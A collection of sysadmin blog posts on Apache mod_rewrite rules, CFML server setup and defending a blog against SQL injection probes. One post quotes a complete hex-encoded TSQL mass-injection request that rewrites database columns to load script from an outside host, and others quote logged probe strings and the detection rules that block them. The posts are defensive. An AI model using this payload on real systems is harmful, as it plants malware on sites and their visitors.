
Additional thoughts on SQL injection attacks

This is a short follow-up to my post on Friday about a SQL injection attack against this blog. Since the first attempt on 3 Feb 2010, I've logged 17,663 attempts. This is the first hit, from 94.142.131.77 (Latvia Cesis Sia Css Group):

94.142.131.77 - - [03/Feb/2010:03:33:49 -0800] "GET /machblog/index.cfm?event=showEntriesByCategory&categoryId=-1'&categoryName=Tomcat HTTP/1.0" 200 19689 "-" "Mozilla/4.0 (compatible; Synapse)"

Compare that to the most recent request from 68.12.167.207 (United States Phoenix Cox Communications Inc.), showing the forwarding response:

68.12.167.207 - - [05/Aug/2013:09:51:16 -0700] "GET /machblog/index.cfm?event=showcategoryrss&categoryid=-1%27&categoryname=cygwin HTTP/1.0" 302 354 "-" "Mozilla/4.0 (compatible; Synapse)"

They didn't initially URL-escape the single-quote character. Maybe they intended to, but for whatever reason, their script failed to operate as intended. Just in case, I'll update my protection to catch both situations:

RewriteCond %{QUERY_STRING} (=-1%27|=-1')
RewriteRule ^ http://www.google.com/? [R=301,L]

Since I added the parenthesis characters for the logical group match, I no longer need to escape the equals character. I suppose that's another way to avoid escaping the equals character with a backslash, if you felt so inclined. Also, thinking about it a moment, I might not want to forward the client to Google with the original query string. I can prevent that by appending a question mark to the destination URL. Finally, I probably want to use an HTTP 301 permanent redirect response, just in case Apache Synapse will do something special with that status code, like remove the URL from a queue. Doubtful.
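As a quick offline sanity check (mod_rewrite matches %{QUERY_STRING} before any URL decoding, so %27 appears literally), the alternation can be exercised with a few lines of Python. The query strings here are taken from the log entries above, plus a made-up legitimate request:

```python
import re

# The alternation from the RewriteCond above. Apache applies CondPatterns
# as unanchored searches, so re.search is a close-enough stand-in.
pattern = re.compile(r"(=-1%27|=-1')")

samples = [
    "event=showEntriesByCategory&categoryId=-1'&categoryName=Tomcat",  # raw quote
    "event=showcategoryrss&categoryid=-1%27&categoryname=cygwin",      # escaped quote
    "event=showEntry&entryId=0259A4F6-BB40-4D25-A4EFB066DF8E34DF",     # legitimate
]
for qs in samples:
    print(bool(pattern.search(qs)))  # True, True, False
```

Both attack variants match, and the normal request sails through.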

A distributed SQL injection attack

My blog has been sending a few hundred exception alerts for the past couple days, which is not uncommon. Every poorly scripted crawler and buggy RSS parser sends malformed URLs that throw an exception because something isn't a proper UUID. I have become quite accustomed to ignoring all that nonsense. However, this most recent batch was different. It was a deliberate attempt to find an SQL injection flaw. For example, instead of sending /machblog/index.cfm?pageId=foo they sent /machblog/index.cfm?pageId=-1%27. And for URLs with more than one argument, they tried the premature close-quote trick for each value. It's not clear to me how they would recognize a successful exploit was executed. There is no payload following the quote character. Maybe their attack isn't fully written, or perhaps they're looking for a response that is specific to a particular application.

The more interesting thing was where the hits were coming from. Here is a sample of hits from a couple of hours:

From all over the world, somebody really wanted to exploit my little blog. It was pretty easy to identify these as all being part of the same attack system because the HTTP headers sent were identical. They appear to be using the Apache Synapse project to launch and manage the URLs. To deal with it, I just created a simple Apache HTTP rewrite rule to forward them to Google:

RewriteCond %{QUERY_STRING} \=-1%27
RewriteRule ^ http://www.google.com

Note that the regex needs the leading backslash: without it, the special variants of the RewriteCond condition pattern would treat the leading = as a test for lexicographical equality with "-1%27". It's a subtle detail, but it makes all the difference.

Some day, I'll upgrade my blog to NGINX + Current Tomcat + Current Railo + ContentBox from Apache + Old Tomcat + Old Open BlueDragon + MachBlog. Until then, I just need it to soldier on.

Dealing with UUID values in URLs

A few days ago, David Flinner posted a comment via Google+ about a blog post I made recently. I saw the ugly URL back to my blog and clicked on it for no particular reason. My instance of MachBlog threw an exception because the URL contained a UUID with a trailing dot. When MachBlog searched for the post matching that primary key, it came up empty. This sort of problem happens all the time, and I don't know why it's so difficult for spiders to pick up the proper URL. I know I should migrate someday -- especially to something that could deal with human comments -- but there are other things higher up on the todo list.

At any rate, I decided to take another look at my Apache URL rewriting rules and fix the issue. Previously, I was supporting a shortcut URL like /blog/UUID, which redirects to /machblog/index.cfm?event=showEntry&entryId=UUID. I was also checking to see that incoming URLs had a proper UUID (the right number of hex values separated in the correct positions by dashes). I made a change to the rules so that trailing characters would be hacked off. Here are the new rules:

# MachBlog shortcut
RewriteRule ^/blog/([-a-f0-9]{35}) /machblog/index.cfm?event=showEntry&entryId=$1 [NC,R,L]

# URL decode a doubly-encoded UUID
RewriteCond %{QUERY_STRING} entryId=([a-f0-9]{8})%2D([a-f0-9]{4})%2D([a-f0-9]{4})%2D([a-f0-9]{16}) [NC]
RewriteRule .* /machblog/index.cfm?event=showEntry&entryId=%1-%2-%3-%4 [NE,R,L]

# Truncate extra characters
RewriteCond %{QUERY_STRING} entryId=([-a-f0-9]{35})[^&] [NC]
RewriteRule .* /machblog/index.cfm?event=showEntry&entryId=%1 [NE,R,L]

Note that it's important to use the no-escape (NE) flag on the rewrite so that extra URL encoding isn't introduced.
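The same truncation logic could also live in application code as a defensive check before the query runs. Here's a rough Python sketch of the idea; the helper name and regex are mine, not MachBlog's:

```python
import re

# CFML's createUUID() format: 8-4-4-16 hex groups, 35 characters total.
# Hypothetical helper mirroring the truncation rewrite rule above.
UUID_RE = re.compile(r"[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{16}")

def extract_entry_id(value):
    # Return the leading UUID, dropping any trailing junk (e.g. a stray dot),
    # or None when the value isn't a UUID at all.
    m = UUID_RE.match(value)
    return m.group(0) if m else None

print(extract_entry_id("0259A4F6-BB40-4D25-A4EFB066DF8E34DF."))  # trailing dot dropped
print(extract_entry_id("not-a-uuid"))                            # None
```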

Preventing SCCS Data Leaks

Many people, right or wrong, deploy CFML applications to the web server by performing a checkout from a source code control system, such as Subversion or Git. This has the effect of placing repository information in directories with the rest of the files; ${APPROOT}/**/.svn and ${APPROOT}/.git, for example. It's possible that this repository information (containing the code in plain text and configuration files) will be exposed by the web server. That would be bad.

Whether the repository data is visible to an HTTP client depends on several factors: the OS, the web server and configuration, the directory and file permissions and OS- and filesystem-specific attributes. Probably the two most common environments are Windows with IIS and Linux with Apache. In the first case, IIS by default is configured to hide files and directories with the NTFS hidden attribute. Since both Subversion and Git create their repository directories with this flag enabled, the default scenario on Windows/IIS is safe. However, the same is not true for Linux/Apache (or Apache on Windows, for that matter).

Apache has always shipped, to the best of my knowledge, with a server-wide directive to prevent disclosing .htaccess and .htpasswd files:

<FilesMatch "^\.ht">
    Order allow,deny
    Deny from all
    Satisfy All
</FilesMatch>

It's not enough, I'm afraid, to just drop the "ht" from that regex, since the files inside the .svn and .git directories don't themselves begin with a dot. To properly secure the SCCS artifacts, I like to use the trusty mod_rewrite module:

RewriteRule /(\.svn|\.git)/.* - [L,F]
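An alternative that doesn't involve mod_rewrite is to deny the directories themselves. Here's a sketch using the same Apache 2.2 access-control syntax as the stock FilesMatch directive above; I haven't battle-tested this variant, so adjust the pattern to your layout:

```apache
<DirectoryMatch "/\.(svn|git)(/|$)">
    Order allow,deny
    Deny from all
    Satisfy All
</DirectoryMatch>
```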

And while I'm on the topic of using mod_rewrite to secure an application, here are some rules I use to prevent any similar shenanigans:

RewriteRule ^/app/(config|filters|listeners|plugins|properties|views)/.* - [L,F]
RewriteRule ^/(MachII|MachIIDashboard|coldspring|transfer|cfpayment)/.* - [L,F]
RewriteRule ^/(db|gen|model|taglib)/.* - [L,F]

Please feel free to comment. Oh wait, I'm lame and haven't enabled comments on this blog. I suppose you could send them to @jlamoree instead.

ColdFusion/JRun + Apache Commons Logging

I recently encountered a problem I'd never seen before when taking advantage of powerful Java libraries within CFML components. Since this is really specific to Adobe ColdFusion and Macromedia JRun, it won't be an issue with other configurations. Specifically, here are the details:

  • Microsoft Windows “Server” 2003 Standard Edition
  • Adobe ColdFusion 8.01 Enterprise as MultiServer
  • JavaLoader 1.0 beta
  • jXLS 0.9.9-SNAPSHOT
  • Apache POI 3.5-FINAL
  • Apache Commons BeanUtils 1.8.0
  • Apache Commons BeanUtils Collections 1.8.0
  • Apache Commons BeanUtils Core 1.8.0
  • Apache Commons Collections 3.2.1
  • Apache Commons Digester 1.8
  • Apache Commons JEXL 1.1
  • Apache Commons Logging 1.1.1

The project uses the jXLS XLSTransformer utility class to parse an Excel file and to push information into cells containing syntax like ${bean.prop}. It worked fine on my workstation, but when running on the staging servers, it threw an exception with the following message: User-specified log class 'jrunx.axis.Logging' cannot be found or is not useable.

After many hours of investigation, I tracked the problem down to the so-called discovery process that org.apache.commons.logging.LogFactory uses to provide logger implementations. It was my assumption that when using Mark Mandel's JavaLoader to create instances of classes from the JAR files added to its ClassLoader, they would be isolated from the rest of the JVM. That's not exactly how it works, even if configured not to use ColdFusion's ClassLoader as the parent. To force the LogFactory not to use jrunx.axis.Logging, I tried rebuilding the jXLS library with a commons-logging.properties file to specify which logger implementation to use; I tried adding the properties file to the lib directory. Neither solved the problem.

The solution is pretty simple. After configuring JavaLoader, and before having it instantiate the needed XLSTransformer, just set the desired logger programmatically. Here is the chunk of XML that ColdSpring uses to fill JavaLoader with all the JAR files required.

<bean id="jxlsClassPath" class="model.io.FileEnumerator">
    <property name="pathList">
        <value>/jxls/lib</value>
    </property>
    <property name="patternList">
        <value>*.jar</value>
    </property>
</bean>

<bean id="jxlsFactory" class="jxls.Factory">
    <property name="javaloader">
        <bean class="javaloader.JavaLoader">
            <constructor-arg name="loadPaths">
                <bean factory-bean="jxlsClassPath" factory-method="getFileArray"/>
            </constructor-arg>
        </bean>
    </property>
</bean>

The code inside the CFC that does the work of creating the XLSTransformer then explicitly sets the logger:

<cfscript>
    var javaLoader = getJavaLoader();
    var logFactory = "null";
    var transformer = createObject("component", "jxls.Transformer").init();
    logFactory = javaLoader.create("org.apache.commons.logging.LogFactory").getFactory();
    logFactory.setAttribute("org.apache.commons.logging.LogFactory", "org.apache.commons.logging.impl.LogFactoryImpl");
    logFactory.setAttribute("org.apache.commons.logging.Log", "org.apache.commons.logging.impl.NoOpLog");
    transformer.setXLSTransformer(getJavaLoader().create("net.sf.jxls.transformer.XLSTransformer"));
    return transformer;
</cfscript>

There was much celebration when this worked, I assure you.

Sending Files: mod_xsendfile vs. CFCONTENT

There is a blog post and comment thread on Ben Nadel's site about File Downloads Without Using CFContent that Sami Hoda alerted me to. Specifically, he pointed to comments about mod_xsendfile, an Apache module that serves files by scanning the output for a special HTTP header. This is really awesome in a CFML/JEE environment because the application server is freed up from waiting for a file to finish transferring.

I did some experimentation with mod_xsendfile v0.11 on Windows XP (yes, you read that correctly, on Windows) using Apache 2.2. It works beautifully. Here's an example of the web server configuration:

LoadModule xsendfile_module modules/mod_xsendfile-0.11.so

<VirtualHost *:80>
    ServerName downloads
    DocumentRoot "C:/workspace/Download"
    XSendFile on
    XSendFileIgnoreEtag on
    XSendFileIgnoreLastModified on
    XSendFilePath "C:/Documents and Settings/jlamoree/My Documents/Downloads"
    <Directory "C:/workspace/Download">
        AllowOverride all
        Order allow,deny
        Allow from all
    </Directory>
</VirtualHost>

The experimental CFML reads a directory of files and displays a list of links, one for a download using mod_xsendfile, and another to download a file using cfcontent. The meat of the code is pasted below, but you can download the entire experiment as mod_xsendfile-experiment.zip.

<cfheader name="Content-Disposition" value="attachment; filename=""#url.filename#""" />
<cfif url.method eq "mod_xsendfile">
    <cfheader name="Content-Type" value="application/octet-stream" />
    <cfheader name="X-Sendfile" value="#local.filename#" />
<cfelseif url.method eq "cfcontent">
    <cfcontent file="#local.filename#" reset="yes" deletefile="no" type="application/octet-stream" />
</cfif>
<cfabort />

I created a quick and dirty JMeter test to compare both methods of sending an 8 MB file. The first request using mod_xsendfile took 327 ms; the second request, only 99 ms. Using cfcontent, the request times were 205 ms and 183 ms. So, take that with a grain of salt. In fact, use a whole salt shaker.

Configuring a Production Open BlueDragon Server

I've just finished building up a couple production servers to host web applications. The servers are Xen guests on an AMD Quad-Core Opteron x86_64 host. The VPS template is a minimal installation of CentOS, to which I added packages as needed. The release of Sun Java 1.6u12 came out just as I was writing this, so these instructions will need to get updated slightly when JPackage has a new RPM (more on that later). Both Matt Woodward and Dave Shuck recently wrote about configuring CFML engines with Tomcat. The installation I'll describe is somewhat similar.

  • CentOS 5.2
  • Tomcat 5.5.23 (tomcat5-5.5.23-0jpp.7.el5_2.1)
  • Apache 2.2 (httpd-2.2.3-11.el5_2.centos.4)
  • Sun Java 1.6u11 (java-1.6.0-sun-1.6.0.11-1jpp)
  • Sun JavaMail 1.4.1
  • Open BlueDragon 1.0.1

The installation of packages using yum is a snap; however, there was an issue with the architecture detection. There is a simple workaround, which is to hard-code i386 as the basearch:

sed -i -r 's/\$basearch/i386/g' /etc/yum.repos.d/CentOS-Base.repo

The procedure is to install jpackage-utils, then download and repackage the Sun Java SE Development Kit 6 (JDK 1.6) using the JPackage Project non-free nosrc RPM. I install some, but not all, of the resulting RPMs:

yum --nogpgcheck localinstall java-1.6.0-sun-1.6.0.11-1jpp.i586.rpm java-1.6.0-sun-devel-* java-1.6.0-sun-fonts-*

The CentOS Wiki has a thorough article on installing Java on CentOS. I've considered using OpenJDK, but I don't know what sort of compatibility issues that would raise.

The Tomcat server starts up just fine with GNU's version of the Java runtime (libgcj and java-1.4.2-gcj-compat). However, using the GNU version of JavaMail (classpathx-mail) instead of Sun JavaMail, the following chunk of CFML will fail with a javax.mail.NoSuchProviderException exception from within the Open BlueDragon web application:

<cfscript>
    server = "localhost";
    port = 25;
    username = "";
    password = "";
    mailSession = createObject("java", "javax.mail.Session").getDefaultInstance(createObject("java", "java.util.Properties").init());
    transport = mailSession.getTransport("smtp");
    transport.connect(server, JavaCast("int", port), username, password);
    transport.close();
</cfscript>

Open BlueDragon does include the correct JAR, but the JVM that Tomcat configures loads the system version first. Rather than muck about with the classpaths, I downloaded the current version of JavaMail, extracted mail.jar, and created an alternatives link:

unzip -j -d /tmp javamail-1_4_1.zip javamail-1.4.1/mail.jar
mv /tmp/mail.jar /usr/share/java/javamail-1.4.1.jar
alternatives --install /usr/share/java/javamail.jar javamail /usr/share/java/javamail-1.4.1.jar 5000
alternatives --auto javamail
file /var/lib/tomcat5/common/lib/\[javamail\].jar

Tomcat installs a set of symlinks to /usr/share/tomcat5. Configuration files are placed in /etc/tomcat5. For this installation, I use a stripped-down version of server.xml that provides web application hosting on a per-user basis.

<Server port="8005" shutdown="SHUTDOWN">
    <GlobalNamingResources />
    <Service name="Catalina">
        <Connector port="8080" address="127.0.0.1" protocol="HTTP/1.1" />
        <Connector port="8009" address="127.0.0.1" protocol="AJP/1.3" />
        <Engine name="Catalina" defaultHost="localhost">
            <Host name="localhost" appBase="webapps" unpackWARs="true" autoDeploy="true" debug="0" />
            <Host name="localhost-username" appBase="/home/username/webapps" unpackWARs="false" autoDeploy="false" debug="1">
                <Context path="" docBase="openbd" allowLinking="true" caseSensitive="true" swallowOutput="true" />
            </Host>
        </Engine>
    </Service>
</Server>

The standard Tomcat configuration has a single Host within an Engine named Catalina. I've added a second Host that is specific to a system user username, which allows each user on the system to manage their own deployed web applications and choose their own root Context. Installing Open BlueDragon as the default web application simplifies the Apache HTTP configuration.

The username user has an Apache HTTP configuration file in /etc/httpd/conf.d/username.conf with mod_rewrite rules to proxy all requests for CFML files to the Tomcat HTTP Connector. I had intended to use the AJP Connector with mod_proxy_ajp, but there is a problem with the proxy request not specifying the proper hostname. There might be a solution to that issue, but I haven't found it yet. The plain mod_proxy_http module works properly in the following configuration:

<VirtualHost *:80>
    DocumentRoot /home/username/websites/sitename
    ...
    RewriteCond %{SCRIPT_FILENAME} \.cfm$
    RewriteRule ^/(.*)$ http://localhost-username:8080/$1 [P]
</VirtualHost>

The rest of the Apache HTTP configuration handles web requests for flat files, served from ~/websites/sitename. The CFML files can be placed in ~/webapps/openbd, however an easier deployment is to place everything in ~/websites/sitename (like you would with a typical ColdFusion server). Symbolic links can be added for directories containing CFML. Consider the following:

cd ~/webapps/openbd
ln -s ../../websites/sitename/MachII MachII

It would probably be a good idea to set the Open BlueDragon root mapping appropriately. There are a few issues with file ownership and permissions that I didn't address above. I've added username to the /etc/sudoers file, granting that user limited access.

Quick and Dirty Configuration File Security

I follow the convention that XML configuration files for Mach-II, ColdSpring, and Transfer ORM go in the $WEBROOT/$APPROOT/config directory. This directory is web accessible, and unless otherwise protected, would leak information that could be compromising. There are many ways to secure this information, but a quick and dirty way to do it is add a .htaccess file to the source tree:

# /home/www/sites/example.com/app/config/.htaccess
Order allow,deny
Deny from all

Of course, this will only work if Apache is configured with the default AccessFileName directive and the config directory is beneath a path with AllowOverride specifying (at least) Limit. For example:

# /etc/httpd/conf.d/example.com.conf
<Directory /home/www/sites/example.com>
    AllowOverride Limit
</Directory>

Another method, which I use on sites with large sets of URL rewrite rules, is creating a rule to forbid access to matching URLs. For example:

# /etc/httpd/conf.d/example.com.conf
RewriteRule ^/app/config/.* / [L,F]

The rewrite has the same effect, but doesn't require the .htaccess file or AllowOverride directive.

MSNBot Madness

The MSN search engine (AKA Live Search, apparently) uses the MSNBot to crawl websites for content. For whatever reason, I see that it unnecessarily percent encodes values in the query string, causing the dash character used in the GUID to be represented with %2D instead of -. Even worse, I see it making the same request again using a double encoding on the separator character in the GUID: %252D. When MachBlog uses the value from the URL to query the correct blog post, it encounters an error because the parameter isn't a standard 35 character GUID.

I don't see any other spiders making this error. However, I suspect what happened is that the MSNBot parsed the XML RSS feed like a normal HTML page, and added all the /rss/channel/item/link text nodes to the URL parse stack. MachBlog uses the URLEncodedFormat function when building the URL. This may have been changed in newer versions of MachBlog -- I didn't check. A fairly simple fix would be to check the format of URL.entryId before using it in a query.
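The mechanics of the double encoding are easy to reproduce outside the crawler. Here's an illustrative Python sketch (the UUID value is made up):

```python
from urllib.parse import quote, unquote

entry_id = "0259A4F6-BB40-4D25-A4EFB066DF8E34DF"

# MSNBot-style over-encoding: the dash becomes %2D.
once = entry_id.replace("-", "%2D")
# A second, naive encoding pass escapes the percent signs themselves.
twice = quote(once, safe="")

print(twice)                                 # contains %252D
print(unquote(unquote(twice)) == entry_id)   # True: decoding twice recovers the UUID
```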

I decided to attack the problem at the web server instead. Some mod_rewrite rules match the pattern of a percent encoded GUID and break it into groups. The subsequent rule uses the groups to build a redirection.

RewriteCond %{QUERY_STRING} entryId=([\w]{8})%2D([\w]{4})%2D([\w]{4})%2D([\w]{16}) [NC]
RewriteRule .* /machblog/index.cfm?event=showEntry&entryId=%1-%2-%3-%4 [NE,R,L]

What if the event was something other than "showEntry"? Well, assuming that the cause of this whole problem is that the XML RSS feed is being parsed as an HTML page, that's the only event specified.

Ignoring SQL Injection Attacks

Over the past few months, I've seen an increase in SQL injection attacks on my web applications. This clutters up the web log with long URLs containing an encoded TSQL statement that will modify the content of a Microsoft SQL Server database. It also causes my application to throw an exception (the designed behavior) and send an e-mail about the problem. The following is an example of the request that a script kiddie would craft:

GET /page.cfm?var1=val1&var2=val2';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445 434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C4152 45205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D 652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D62 2E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970 653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C 655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040 542C4043205748494C4528404046455443485F5354415455533D302920424547494E2065786563282775706461 7465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C73637269707420 7372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F73637269 70743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B652027272522 3E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63 737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020 5461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F 72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1

Line breaks have been inserted to make it fit within the page boundaries. You can use a tool such as the JavaScript ASCII Converter to see what is encoded within the hex character string.
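Alternatively, no external tool is needed: the CAST(0x... AS CHAR) payload is just ASCII encoded as hex, so a couple of lines of Python will decode it. Here it is run on the first few bytes of the blob above:

```python
# First seven bytes of the hex blob, which spell out the TSQL keyword.
prefix = "4445434C415245"
print(bytes.fromhex(prefix).decode("ascii"))  # DECLARE
```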

To prevent this junk from being acknowledged by my web server, I've used a bit of mod_rewrite magic.

RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{QUERY_STRING} DECLARE
RewriteRule .* http://127.0.0.1/ [E=ScriptKiddies:1,R,L]

CustomLog log/access_log combined env=!ScriptKiddies

I check that the request method is GET because POST requests are handled differently; also, the form fields of a POST aren't recorded in the Apache web log. The test for the literal string DECLARE is all that is needed to spot a bogus request. If there comes a time in the future that a valid request is falsely identified, I can adjust the regular expression to be more explicit. The script kiddies' HTTP client is sent an HTTP/1.1 302 Found response, which it probably ignores. Finally, the request is never written into the logs.

Apache and Environment Variables

Here's another Apache tip. The scenario is that there are multiple real web servers behind a load balancer. When a client browser makes a request, it's not apparent which real server created the response. In the past, I have added HTTP headers to the response containing the hostname of the real server. The problem is that if the configuration files differ on each real server, it's difficult to keep them in sync. Sure, I could maintain templates containing tokens that are replaced during distribution, but there's an easier solution.

Consider two configuration files, one on server01; the other on server02:

# /etc/http/conf.d/site.conf on server01
Header set X-Hostname server01

# /etc/http/conf.d/site.conf on server02
Header set X-Hostname server02

Because the files differ, care must be taken when changing either file. The solution is to make the header value dynamic so the same file works on both servers:

# /etc/http/conf.d/site.conf
PassEnv HOSTNAME
Header set X-Hostname "%{HOSTNAME}e"

You'd think this would work a treat, but it doesn't because Apache's environment does not contain HOSTNAME. I believe the simplest solution is to modify the file that gets included when /etc/init.d/httpd is used to start/stop the service. Just one line needs to be added to the /etc/sysconfig/httpd file:

export HOSTNAME=`hostname`

To make this change easy, and less error-prone, I wrote a little script to do the job:

#!/bin/sh
CFGFILE=/etc/sysconfig/httpd
if grep -q HOSTNAME $CFGFILE; then
    echo "Error: Looks like $CFGFILE is already patched."
    exit 1
fi
cat >> $CFGFILE <<'EOF'
# Export server's hostname for use in HTTP headers
# to identify a real server in the cluster.
export HOSTNAME=`hostname`
EOF
echo "Done!"

There you have it. Once the httpd daemon is restarted, it will pick up the HOSTNAME environment variable, and send the right HTTP header.

Saying hello to Nagios

While setting up the VPS that hosts this site, I noticed that the Nagios tests of the HTTP service were being forwarded and logged like a normal client. That's two log lines every 15 seconds -- one for the request of /, then another for the relocated document /machblog/index.cfm. I wanted to change the way that Apache responds to service checks in two ways:

  • Do not log the requests made by the service checking program
  • Do not forward the service checking program

This is quite easy with a sprinkle of Apache module voodoo. Using mod_setenvif, the server can test the User Agent to detect the Nagios plugin client. The result of the test is passed to mod_log_config so the hit isn't written to the log; then it's used by mod_rewrite to bypass the redirection. The directives are placed into /etc/httpd/conf.d/_default_virtualhost.conf, which is read first by Apache during startup because it processes included files alphabetically. It's important to apply the logic to the default (first) virtual host because the service check program makes a plain HTTP/1.0 request by IP address.

<VirtualHost *:80>
    SetEnvIfNoCase User-Agent nagios ServiceCheck
    CustomLog logs/access_log combined env=!ServiceCheck
    RewriteCond %{ENV:ServiceCheck} !1
    RewriteRule .* http://www.lamoree.com/ [R,L]
</VirtualHost>

There are a few different ways I could have achieved the same result, but I think this is the most efficient because the User Agent string is only tested once. I can also (and do) add more rules to thwart bots, worms, and script kiddies.

A couple great tools

I've been doing quite a bit of data shuffling lately in my project to migrate corporate e-mail services from an older server to a new architecture using Postfix, Dovecot, and OpenLDAP. I was inspired by Jamm, which I have used with good results at other installations. However, the administration interface didn't really address all my requirements, so I wrote my own. More on that later.

Anyway, this all leads up to my praise for a couple of products that have made life much more, um, livable. They are <oXygen/> XML Editor and Apache Directory Studio, formerly called LDAP Studio.

I've used oXygen XML Editor for several years, and it's gotten orders of magnitude better since then. That's not to say that it wasn't a solid product when I started using it; rather, it has become an amazing suite of XML tools since then. Case in point: when I needed to import a whole bunch of e-mail forwarding aliases, I used the text import tool to build an XML file that I could then parse with my own program. I had never tried this feature before, but without even glancing at the manual I was able to complete the task in minutes.

Another thing that SyncRO soft (in ROmania, get it?) should get a whole lot of praise for is releasing a multi-platform Java application that feels like a native Mac OS X application. Many companies that create cross-platform Java applications have completely broken user interfaces when used with the Java Look and Feel library for Mac OS X (Aqua LAF). For example, Gentleware's Poseidon for UML is horrendous, which is a shame because it's an otherwise very good UML tool.

Oxygen XML Editor is distributed as a traditional tarball (.tar.gz) that is simply unarchived and executed. That's it -- no installer like Macrovision InstallAnywhere, which sucks really hard, by the way. The only installation to speak of is to paste in a license key upon the first launch. Simple. If I could make one suggestion, it would be to follow Apple's installer guidelines by distributing the software in a compressed Disk Image.

I have one final comment about Oxygen XML Editor: price. I use the Enterprise Edition, which is currently US$ 275. At first I thought that was too expensive, but after trying some of the offerings from other vendors, I came to the conclusion that it's a bargain. I don't hesitate recommending it to anyone.

I've only used Apache Directory Studio for a short while. Before that, I was using ldapsearch, ldapadd, and ldapmodify on the command line. While I was setting up the system, the CLI tools were necessary to aid in debugging a few problems. However, now that most of the problems are ironed out, I can switch to a GUI. Apache Directory Studio is an Eclipse RCP application, which is great because I'm very comfortable in Eclipse. I spend most of my day in CFEclipse.

Okay, that's enough gushing for now. Back on your heads.